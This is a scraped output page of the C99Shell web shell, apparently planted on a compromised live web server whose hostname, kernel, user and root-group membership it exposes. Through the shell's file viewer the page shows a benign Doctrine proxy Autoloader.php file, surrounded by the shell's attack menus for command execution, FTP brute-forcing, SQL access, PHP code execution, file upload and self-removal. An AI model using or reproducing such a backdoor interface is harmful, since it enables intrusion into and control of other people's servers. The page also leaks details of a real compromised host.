!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/doctrine/common/src/Proxy/   drwxr-xr-x
Free 28.48 GB of 117.98 GB (24.14%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Autoloader.php (2.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Doctrine\Common\Proxy;

use 
Closure;
use 
Doctrine\Common\Proxy\Exception\InvalidArgumentException;

use function 
call_user_func;
use function 
file_exists;
use function 
is_callable;
use function 
ltrim;
use function 
spl_autoload_register;
use function 
str_replace;
use function 
strlen;
use function 
strpos;
use function 
substr;

use const 
DIRECTORY_SEPARATOR;

/**
 * Special Autoloader for Proxy classes, which are not PSR-0 compliant.
 *
 * @internal
 */
class Autoloader
{
    
/**
     * Resolves proxy class name to a filename based on the following pattern.
     *
     * 1. Remove Proxy namespace from class name.
     * 2. Remove namespace separators from remaining class name.
     * 3. Return PHP filename from proxy-dir with the result from 2.
     *
     * @param string $proxyDir
     * @param string $proxyNamespace
     * @param string $className
     * @psalm-param class-string $className
     *
     * @return string
     *
     * @throws InvalidArgumentException
     */
    
public static function resolveFile($proxyDir$proxyNamespace$className)
    {
        if (
strpos($className$proxyNamespace) !== 0) {
            throw 
InvalidArgumentException::notProxyClass($className$proxyNamespace);
        }

        
// remove proxy namespace from class name
        
$classNameRelativeToProxyNamespace substr($classNamestrlen($proxyNamespace));

        
// remove namespace separators from remaining class name
        
$fileName str_replace('\\'''$classNameRelativeToProxyNamespace);

        return 
$proxyDir DIRECTORY_SEPARATOR $fileName '.php';
    }

    
/**
     * Registers and returns autoloader callback for the given proxy dir and namespace.
     *
     * @param string        $proxyDir
     * @param string        $proxyNamespace
     * @param callable|null $notFoundCallback Invoked when the proxy file is not found.
     *
     * @return Closure
     *
     * @throws InvalidArgumentException
     */
    
public static function register($proxyDir$proxyNamespace$notFoundCallback null)
    {
        
$proxyNamespace ltrim($proxyNamespace'\\');

        if (
$notFoundCallback !== null && ! is_callable($notFoundCallback)) {
            throw 
InvalidArgumentException::invalidClassNotFoundCallback($notFoundCallback);
        }

        
$autoloader = static function ($className) use ($proxyDir$proxyNamespace$notFoundCallback) {
            if (
$proxyNamespace === '') {
                return;
            }

            if (
strpos($className$proxyNamespace) !== 0) {
                return;
            }

            
$file Autoloader::resolveFile($proxyDir$proxyNamespace$className);

            if (
$notFoundCallback && ! file_exists($file)) {
                
call_user_func($notFoundCallback$proxyDir$proxyNamespace$className);
            }

            require 
$file;
        };

        
spl_autoload_register($autoloader);

        return 
$autoloader;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--